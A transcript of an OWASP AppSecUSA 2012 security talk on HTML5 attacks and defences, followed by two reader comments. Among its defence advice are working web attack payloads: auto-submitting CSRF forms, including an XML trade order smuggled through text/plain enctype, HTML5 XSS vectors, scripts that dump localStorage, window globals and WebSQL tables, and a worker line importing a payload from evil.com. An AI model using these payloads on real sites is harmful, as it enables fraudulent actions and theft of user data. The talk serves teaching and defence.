XSS and CSRF with HTML5
 

Comments

  • thanks for sharing
  • thanks for the slides, but CSRF part is not very clear for me unfortunately.....any videos, or blog posts with more details? Thanks.

    Presentation Transcript

    • XSS & CSRF with HTML5: Attack, Exploit and Defense. Shreeraj Shah, Blueinfy Solutions Pvt. Ltd. (shreeraj.shah@blueinfy.net). OWASP AppSecUSA 2012. Copyright © The OWASP Foundation. Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation, http://www.owasp.org
    • Who Am I? http://shreeraj.blogspot.com, shreeraj@blueinfy.com, http://www.blueinfy.com, Twitter @shreeraj. Founder & Director: Blueinfy & iAppSecure Solutions Pvt. Ltd. Past experience: Net Square (Founder), Foundstone (R&D/Consulting), Chase (Middleware), IBM (Domino Dev). Interest: web security research. Published research: articles / papers (SecurityFocus, O'Reilly, DevX, InformIT etc.); tools (DOMScan, DOMTracer, wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc.); advisories (.Net, Java servers etc.); presented at Blackhat, RSA, InfoSecWorld, OSCON, OWASP, HITB, Syscan, DeepSec etc. Books (author): Web 2.0 Security – Defending Ajax, RIA and SOA; Hacking Web Services; Web Hacking. OWASP 2
    • HTML5 VECTORS – ATTACK SURFACE OWASP 3
    • HTML5 – Attacks on the rise … Evolution of HTML5: 1991 – HTML started (plain and simple); 1996 – CSS & JavaScript (welcome to the world of XSS and browser security); 2000 – XHTML1 (growing concerns and attacks on browsers); 2005 – AJAX, XHR, DOM (attack cocktail and surface expansion); 2009 – HTML5 (here we go… new surface, architecture and defense): HTML+CSS+JS. OWASP 4
    • Modern Browser Model (diagram): Presentation layer (HTML5 + CSS, Silverlight, Flash, Mobile, plug-ins; APIs for media, geo etc. and messaging); Process & Logic (JavaScript, DOM/Events, Parser/Threads); Browser Native (WebSQL, Cache, Storage, FileSystem); Network & Access (XHR 1 & 2, WebSocket, Plug-in Sockets, Browser Native Network Services); Core Policies (SOP/CORS/Content-Sec, Sandbox). OWASP 5
    • HTML5 Architecture & Threat Model (diagram): a single-DOM/single-page application runs inside the browser's application sandbox (origin policy) with HTML/CSS, JavaScript and the DOM/page, and reaches the target application on the Internet through XHR and WebSockets; native storage (Storage, WebSQL, IndexedDB), FileSystem, Cache, Messaging, Geolocation and other APIs sit beside it; the user interface and cross-domain applications form the trust boundaries. OWASP 6
    • CSRF WITH HTML5 OWASP 7
    • CSRF Attack Vector (diagram): the client/victim browser logs in to the web application (authentication server, application server, database): login success, cookie set. The victim then visits the attacker's site, which serves the attacker's CSRF page with the attack payload; the CSRF attack rides on the live session and succeeds. Successful exploitation: SOP bypass; cookie replay. OWASP 8
    • SOP bypass and Cookie Replay – Basic Type. GET request:
        IMG SRC    <img src="http://host/?command">
        SCRIPT SRC <script src="http://host/?command">
        IFRAME SRC <iframe src="http://host/?command">
      POST request (auto-submitting a form):
        <script type="text/javascript" language="JavaScript">
        document.foo.submit();
        </script>
      OWASP 9
    • Streams – name/value pairs are gone … JSON, XML, JS-Script, JS-Object, JS-Array. OWASP 10
    • CSRF injection – splitting and forcing … With ENCTYPE="text/plain" the body is sent as name=value, so the XML payload is split between the field name and its value and the "=" the browser inserts between them completes the XML declaration:
        <html><body>
        <FORM NAME="buy" ENCTYPE="text/plain" action="http://trade.example.com/xmlrpc/trade.rem" METHOD="POST">
          <input type="hidden" name='<?xml version' value='"1.0"?><methodCall><methodName>stocks.buy</methodName><params><param><value><string>MSFT</string></value></param><param><value><double>26</double></value></param></params></methodCall>'>
        </FORM>
        <script>document.buy.submit();</script>
        </body></html>
      OWASP 11
    • CSRF with XHR and CORS bypass (browser model diagram, XHR 1 & 2 and SOP/CORS highlighted). OWASP 12
    • XHR – Level 2 powering CSRF. The XHR object of HTML5 is very powerful: it allows interesting features like cross-origin requests and binary upload/download. xhr.responseType can be set to "text", "arraybuffer", "document" and "blob". Also, for posting a data stream: DOMString, Document, FormData, Blob, File, ArrayBuffer etc… OWASP 13
    • CORS & XHR – ingredients for CSRF. Before HTML5, cross-domain requests were not possible through XHR (SOP applicable). HTML5 allows cross-origin calls with XHR Level 2. CORS (Cross-Origin Resource Sharing) needs to be followed (OPTIONS/preflight calls), adding extra HTTP headers (Access-Control-Allow-Origin and a few others). OWASP 14
    • CORS based HTTP Headers. Request: Origin; Access-Control-Request-Method (preflight); Access-Control-Request-Headers (preflight). Response: Access-Control-Allow-Origin; Access-Control-Allow-Credentials; Access-Control-Expose-Headers; Access-Control-Max-Age (preflight); Access-Control-Allow-Methods (preflight); Access-Control-Allow-Headers (preflight). OWASP 15
    • XHR – Stealth POST/GET. CSRF powered by CORS and XHR: hence a stealth channel and possible silent exploitation. One-way CSRF with any stream, since XHR allows a raw stream from the browser (XML, JSON, binary as well). Two-way CSRF (POST and read both, in case Allow-Origin is set to *). OWASP 16
    • Exploiting the use case: CORS preflight bypass (certain Content-Type values bypass the preflight HTTP call); forcing cookie replay by "withCredentials"; internal network scanning and tunneling; information harvesting (internal crawling); stealth browser shell post-XSS (Allow-Origin *); business functionality abuse (upload and binary streams). OWASP 17
    • CSRF with XHR/HTML5 (diagram): the user establishes a session with the web application (authentication server, application server, database): login request over HTTPS, session cookie returned to the client/victim browser. OWASP 18
    • CSRF with XHR/HTML5 (diagram): the browser uses an XHR call (JavaScript) to make a buy over HTTP, placing an order via JSON services; success. OWASP 19
    • CSRF with XHR/HTML5 (diagram): the session is still live (not yet logged out) when the victim visits the attacker's site and the attacker's CSRF page delivers the payload. Leveraging the XHR call: Content-Type chosen to avoid the preflight; "withCredentials" set to true. OWASP 20
    • CSRF & HTML5 OWASP 21
    • CSRF with XHR/HTML5 (diagram): the XHR on the attacker's CSRF page initiates the HTTP buy request; success, cookie replayed. Hence: without the victim's consent or notice, a stealth HTTP request is generated and silent exploitation takes place. OWASP 22
    • CSRF & HTML5 OWASP 23
    • CSRF with XHR/HTML5 (diagram): the browser has a multi-part form for the business-layer function of uploading bulk orders; success. OWASP 24
    • CSRF/Upload - POC OWASP 25
    • CSRF with XHR/HTML5 (diagram): from the attacker's site, XHR initiates a multi-part HTTP upload; success, cookie replayed. Hence: without the victim's consent or notice, a stealth HTTP upload takes place; silent exploitation… OWASP 26
    • CSRF/Upload OWASP 27
    • Internal Scan – not scan but crawl as well … (diagram): the attacker's site on the Internet delivers a CSRF payload and a stealth channel to the client/victim browser, which then reaches intranet hosts: internal web, HR, mail and web/app application servers. OWASP 28
    • Internal Scan for CORS OWASP 29
    • Scan and DefendScan and look for Content-Type checking on server side CORS policy scan Form and Upload with tokens or notDefense and Countermeasures Secure libraries for streaming HTML5/Web 2.0 content CSRF protections Stronger CORS implementation OWASP 30
    • XSS WITH HTML5 OWASP 31
    • XSS with HTML5 (tags, attributes and events) (browser model diagram, Presentation layer highlighted). OWASP 32
    • HTML5 – Tags/Attributes/Events. Tags: media (audio/video), canvas (getImageData), menu, embed, buttons/commands, form control (keys). Attributes: form, submit, autofocus, sandbox, manifest, rel etc. Events/Objects: navigation (_self), editable content, drag-drop APIs, pushState (History) etc. OWASP 33
    • XSS variantsMedia tagsExamples <video><source onerror="javascript:alert(1)“> <video onerror="javascript:alert(1)"><source> OWASP 34
    • XSS variantsExploiting autofocus <input autofocus onfocus=alert(1)> <select autofocus onfocus=alert(1)> <textarea autofocus onfocus=alert(1)> <keygen autofocus onfocus=alert(1)> OWASP 35
    • XSS variantsForm & Button etc. <form id="test" /><button form="test" formaction="javascript:alert(1)">test <form><button formaction="javascript:alert(1)">testEtc … and more … Nice HTML5 XSS cheat sheet (http://html5sec.org/) OWASP 36
    • Scan and DefendScan and look for Reflected or Persistent XSS spots with HTML5 tagsDefense and Countermeasures Have it added on your blacklist Standard XSS protections by encoding OWASP 37
    • CSP in Action – HTML5 defense … Content Security Policy: defending the browser against possible post-attack scenarios. Based on origin (SOP is the key). Allows a whitelisting mechanism for what "to do" and "not to do". It is possible to send back a notification to the application when a violation takes place. Implementation by extra HTTP headers, varying from browser to browser: X-WebKit-CSP (Safari/Chrome), X-Content-Security-Policy (Firefox). OWASP 38
    • Blocking Scripts. Content-Security-Policy: script-src 'self' – only allowing script from self. Other mechanisms: 'unsafe-inline' – inline script is blocked unless this keyword is granted; 'unsafe-eval' – eval-type calls are blocked unless this keyword is granted. Post-XSS defense can be crafted. OWASP 39
    • Controlling Browser. connect-src – controlling WebSocket, XHR etc.; frame-src – source of the frame (ClickJacking); object-src – Flash, Silverlight etc.; media-src – controlling audio and video; img-src/style-src – image and style sources; default-src https: – locking over SSL only. OWASP 40
    • Example Persistent XSS injectedHTTP/1.1 200 OKDate: Wed, 12 Sep 2012 14:40:31 GMTServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETX-WebKit-CSP: script-src selfX-AspNet-Version: 2.0.50727Cache-Control: privateContent-Type: text/html; charset=utf-8Content-Length: 6146 OWASP 41
    • Storage extraction with XSS (browser model diagram, Storage highlighted). OWASP 42
    • Web Storage ExtractionBrowser has one place to store data – Cookie (limited and replayed)HTML5 – Storage API provided (Local and Session)Can hold global scoped variableshttp://www.w3.org/TR/webstorage/ OWASP 43
    • Web Storage ExtractionIt is possible to steal them through XSS or via JavaScriptSession hijacking – HttpOnly of no usegetItem and setItem callsXSS the box and scan through storage OWASP 44
    • Blind storage enumeration:
        if (localStorage.length) {
          console.log(localStorage.length);
          for (var i in localStorage) {
            console.log(i);
            console.log(localStorage.getItem(i));
          }
        }
      The above code allows extraction of all storage variables. OWASP 45
    • File System StorageHTML5 provides virtual file system with filesystem APIs window.requestFileSystem = window.requestFileSystem || window.webkitRequestFileSystem;It becomes a full blown local system for application in sandboxIt empowers application OWASP 46
    • File System StorageIt provides temporary or permanent file system function init() { window.requestFileSystem(window.TEMPORARY, 1024*1024, function(filesystem) { filesys = filesystem; }, catcherror); } App can have full filesystem in place now. OWASP 47
    • Sensitive information in the filesystem. Assuming the app is creating a profile on the local system. OWASP 48
    • Extraction through XSS. Once you have an entry point – game over! OWASP 49
    • Single DOM/One Page App – XSS. Applications run with a "rich" DOM. JavaScript sets several variables and parameters while loading: GLOBALS. They hold sensitive information, and what if they are GLOBAL and remain for the life of the application? They can be retrieved with XSS. HTTP requests and responses go through JavaScript (XHR) – what about those vars? OWASP 50
    • Blind Enumeration:
        for (var i in window) {
          var obj = window[i];
          try {
            if (typeof(obj) == "string") {
              console.log(i);
              console.log(obj.toString());
            }
          } catch (ex) {}
        }
      OWASP 51
    • Global Sensitive Information Extraction from DOMHTML5 apps running on Single DOMHaving several key global variables, objects and array var arrayGlobals = [my@email.com,"12141hewvsdr9321343423mjfdvint","t est.com"];Post DOM based exploitation possible and harvesting all these values. OWASP 52
    • Global Sensitive Information Extraction from DOM:
        for (var i in window) {
          var obj = window[i];
          if (obj != null && obj != undefined) {
            var type = typeof(obj);
            if (type == "object" || type == "string") {
              console.log("Name:" + i);
              try {
                var my = JSON.stringify(obj);
                console.log(my);
              } catch (ex) {}
            }
          }
        }
      OWASP 53
    • Scan and DefendScan and look for Scanning storageDefense and Countermeasures Do not store sensitive information on localStorage and Globals XSS protection OWASP 54
    • SQLi & Blind Enumeration through XSS (browser model diagram, WebSQL highlighted). OWASP 55
    • SQL InjectionWebSQL is part of HTML 5 specification, it provides SQL database to the browser itself.Allows one time data loading and offline browsing capabilities.Causes security concern and potential injection points.Methods and calls are possible OWASP 56
    • SQL InjectionThrough JavaScript one can harvest entire local database.Example OWASP 57
    • Blind WebSQL Enumeration:
        var dbo;
        var table;
        var usertable;
        for (var i in window) {
          var obj = window[i];
          try {
            if (obj.constructor.name == "Database") {
              dbo = obj;
              obj.transaction(function(tx) {
                tx.executeSql("SELECT name FROM sqlite_master WHERE type='table'", [],
                  function(tx, results) {
                    table = results;
                    // the query runs asynchronously, so the result is read inside the callback
                    if (table.rows.length > 1) usertable = table.rows.item(1).name;
                  }, null);
              });
            }
          } catch (ex) {}
        }
      OWASP 58
    • Blind WebSQL EnumerationWe will run through all objects and get object where constructor is “Database”We will make Select query directly to sqlite_master databaseWe will grab 1st table leaving webkit table on 0th entry OWASP 59
    • Blind WebSQL Enumeration OWASP 60
    • Web Messaging and Worker Injection (browser model diagram, Messaging highlighted). OWASP 61
    • Web Messaging HTML5 is having new interframe communication system called Web Messaging. By postMessage() call parent frame/domain can call with the iframe Iframe can be loaded on cross domain. Hence, create issues – data/information validation & data leakage by cross posting possible worker.webkitPostMessage – faster transferable objects OWASP 62
    • Web Messaging – Scenario. If postMessage() targets *, the page can be loaded in an iframe and the messaging can be hijacked. Also, if the origin is not checked against a fixed value, the frame listens to any domain – again an issue. The incoming stream needs to be checked before innerHTML or eval(). An iframe or Web Worker can glue two streams, same-domain or cross-domain. OWASP 63
    • Origin check OWASP 64
    • Web Worker – Hacks!Web Workers allows threading into HTML pages using JavaScriptNo need to use JavaScript calls like setTimeout(), setInterval(), XMLHttpRequest, and event handlersTotally Async and well supported [initialize] var worker = new Worker(task.js); [Messaging] worker.postMessage(); OWASP 65
    • Web Worker – Hacks! (diagram): the web page (current DOM, JavaScript runtime) talks to a Web Worker via messaging; the worker runs on a background thread on the browser platform with its own scope and objects (XHR, Location, Navigator, Regex, Array, JSON etc.) and no DOM access. OWASP 66
    • Web Worker – Hacks!Security issues It is not allowing to load cross domain worker scripts. (http:, https:,javascript:,data : -No) It has some typical issues  It allows the use of XHR. Hence, in-domain and CORS requests possible  It can cause DoS – if user get stream to run JavaScript in worker thread. Don’t have access to parent DOM though  Message validation needed – else DOM based XSS OWASP 67
    • Web Worker – Hacks! Exmaple<html><button onclick="Read()">Read Last Message</button><button onclick="stop()">Stop</button><output id="result"></output><script> function Read() { worker.postMessage({cmd: read, msg: last}); } function stop() { worker.postMessage({cmd: stop, msg: stop it}); alert("Worker stopped"); } var worker = new Worker(message.js); worker.addEventListener(message, function(e) { document.getElementById(result).innerHTML = e.data; }, false);</script></html> OWASP 68
    • Web Workers – Hacks!Possible to cause XSS Running script Passing hidden payloadAlso, web workers can help in embedding silent running js file and can be controlled.Can be a tool for payload delivery and control within browser frameworkimportScripts("http://evil.com/payload.js") – worker can run cross domain script OWASP 69
    • Scan and DefendScan and look for JavaScript scanning Messaging and Worker implementation DOM calls Use of eval(), document.* calls etc.Defense and Countermeasures Same origin listening is a must for messaging event Secure JavaScript coding OWASP 70
    • APIs … A few other HTML5 APIs are interesting from a security standpoint. File APIs allow local file access and can be mixed with ClickJacking and other attacks to gain client files. Drag-Drop APIs: exploiting self-XSS and a few other tricks, hijacking cookies … Lots more to explore and defend… OWASP 71
    • Resources/References: http://www.html5rocks.com/en/ (solid stuff); https://www.owasp.org/index.php/HTML5_Security_Cheat_Sheet (OWASP stuff); http://html5sec.org/ (quick cheat sheet); http://html5security.org/ (good resources); http://blog.kotowicz.net/ (interesting work). OWASP 72
    • CONCLUSION AND QUESTIONS. http://shreeraj.blogspot.com, shreeraj@blueinfy.com, http://www.blueinfy.com OWASP 73